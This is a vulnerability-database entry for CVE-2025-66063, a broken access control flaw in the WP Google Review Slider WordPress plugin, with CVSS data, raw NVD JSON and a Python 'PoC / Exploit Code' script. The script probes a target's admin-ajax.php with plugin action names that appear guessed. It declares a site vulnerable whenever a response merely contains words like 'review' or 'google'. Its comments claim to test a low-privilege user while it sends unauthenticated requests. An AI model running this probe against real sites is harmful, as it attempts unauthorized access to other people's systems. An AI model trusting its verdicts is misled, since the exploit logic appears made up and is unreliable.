Security Vulnerability Report
中文
CVE-2025-66063 CVSS 5.4 MEDIUM

CVE-2025-66063

Published: 2025-11-21 13:15:47
Last Modified: 2026-04-27 18:16:32

Description

Missing Authorization vulnerability in jgwhite33 WP Google Review Slider wp-google-places-review-slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Google Review Slider: from n/a through <= 17.4.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WP Google Review Slider <= 17.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-66063 PoC - Missing Authorization in WP Google Review Slider # Target: WordPress site with vulnerable WP Google Review Slider plugin (<=17.4) def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-66063 """ # Add WordPress path if not present if not target_url.endswith('/'): target_url += '/' # Common WordPress AJAX endpoint ajax_url = target_url + 'wp-admin/admin-ajax.php' # Try to access plugin's admin functionality without proper authorization # This is a low-privilege user request that should fail but doesn't # Example: Get plugin settings or export reviews test_actions = [ {'action': 'wpggr_get_reviews', 'data': 'export=1'}, {'action': 'wp_google_review_slider_export', 'data': ''}, {'action': 'ggr_admin_action', 'data': 'option=settings'} ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Test', 'Content-Type': 'application/x-www-form-urlencoded' } # Test as unauthenticated or low-privilege user for action_data in test_actions: try: response = requests.post( ajax_url, data=action_data, headers=headers, timeout=10, allow_redirects=False ) # Check if response indicates successful unauthorized access if response.status_code == 200: # Check for sensitive data in response if any(keyword in response.text.lower() for keyword in ['google', 'api', 'key', 'token', 'review', 'setting', 'config']): print(f"[+] VULNERABLE: Found unauthorized access to {action_data['action']}") print(f"[+] Response contains sensitive plugin data") return True except requests.RequestException as e: print(f"[-] Request error: {e}") print("[*] Target may not be vulnerable or plugin not installed") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-66063_poc.py <target_url>") print("Example: python cve-2025-66063_poc.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Testing {target} for CVE-2025-66063") check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66063", "sourceIdentifier": "[email protected]", "published": "2025-11-21T13:15:47.197", "lastModified": "2026-04-27T18:16:32.290", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in jgwhite33 WP Google Review Slider wp-google-places-review-slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Google Review Slider: from n/a through <= 17.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-google-places-review-slider/vulnerability/wordpress-wp-google-review-slider-plugin-17-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}